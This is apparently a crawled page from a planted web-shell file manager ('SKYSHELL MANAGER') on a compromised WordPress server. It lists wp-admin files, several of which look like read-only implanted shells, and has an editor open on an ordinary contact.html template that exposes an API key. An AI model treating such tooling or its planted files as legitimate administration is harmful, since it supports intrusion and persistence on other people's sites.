📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact.html
<!DOCTYPE html> <html> <head> <!-- Basic --> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <!-- Site Metas --> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="author" content="" /> <title>Hubviewers</title> <!-- slider stylesheet --> <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.min.css" /> <!-- bootstrap core css --> <link rel="stylesheet" type="text/css" href="css/bootstrap.css" /> <!-- font awesome style --> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css" /> <!-- Custom styles for this template --> <link href="css/style.css" rel="stylesheet" /> <!-- responsive style --> <link href="css/responsive.css" rel="stylesheet" /> </head> <body> <div class="hero_area"> <!-- header section strats --> <header class="header_section"> <div class="header_top"> <div class="container-fluid"> <div class="contact_nav"> <a href=""> <i class="fa fa-phone" aria-hidden="true"></i> <span> Call : (212) 777-0740 </span> </a> <a href=""> <i class="fa fa-envelope" aria-hidden="true"></i> <span> Email : contact@hubviewers.com </span> </a> </div> </div> </div> <div class="header_bottom"> <div class="container-fluid"> <nav class="navbar navbar-expand-lg custom_nav-container "> <a class="navbar-brand" href="index.html"> <span> Hubviewers </span> </a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class=""> </span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav "> <li class="nav-item "> <a class="nav-link" href="index.html">Home <span class="sr-only">(current)</span></a> </li> <li class="nav-item"> <a class="nav-link" href="about.html"> About</a> </li> <li class="nav-item"> <a class="nav-link" href="service.html">Services</a> </li> <li class="nav-item active"> <a class="nav-link" href="contact.html">Contact Us</a> </li> </ul> </div> </nav> </div> </div> </header> <!-- end header section --> </div> <!-- contact section --> <section class="contact_section layout_padding"> <div class="container"> <div class="heading_container"> <h2> Contact Us </h2> </div> <div class="row"> <div class="col-md-6"> <form action=""> <div> <input type="text" placeholder="Name" /> </div> <div> <input type="text" placeholder="Phone Number" /> </div> <div> <input type="email" placeholder="Email" /> </div> <div> <input type="text" class="message-box" placeholder="Message" /> </div> <div class="d-flex "> <button> SEND </button> </div> </form> </div> <div class="col-md-6"> <div class="map_container"> <div class="map"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3023.3089776960915!2d-73.98326392397328!3d40.7332262713904!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89c259750de6b091%3A0xa2a7dcc8e6440a90!2sWalgreens!5e0!3m2!1sen!2sin!4v1706695122862!5m2!1sen!2sin" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> </div> </div> </div> </div> </section> <!-- end contact section --> <!-- info section --> <section class="info_section "> <div class="container"> <h4> Get In Touch </h4> <div class="row"> <div class="col-lg-10 mx-auto"> <div class="info_items"> <div class="row"> <div class="col-md-4"> <a href=""> <div class="item "> <div class="img-box "> <i class="fa fa-map-marker" aria-hidden="true"></i> </div> <p> 298 1st Ave, New York,<br> North Dakota, 10009,<br> United States. </p> </div> </a> </div> <div class="col-md-4"> <a href=""> <div class="item "> <div class="img-box "> <i class="fa fa-phone" aria-hidden="true"></i> </div> <p> (212) 777-0740 </p> </div> </a> </div> <div class="col-md-4"> <a href=""> <div class="item "> <div class="img-box"> <i class="fa fa-envelope" aria-hidden="true"></i> </div> <p> contact@hubviewers.com </p> </div> </a> </div> </div> </div> </div> </div> </div> </section> <!-- end info_section --> <!-- footer section --> <footer class="footer_section"> <div class="container"> <p> © <span id="displayDateYear"></span> All Rights Reserved Hubviewers. </p> </div> </footer> <!-- footer section --> <script src="js/jquery-3.4.1.min.js"></script> <script src="js/bootstrap.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"> </script> <script src="js/custom.js"></script> <!-- Google Map --> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCh39n5U-4IoWpsVGUHWdqB6puEkhRLdmI&callback=myMap"></script> <!-- End Google Map --> </body> </html>
Save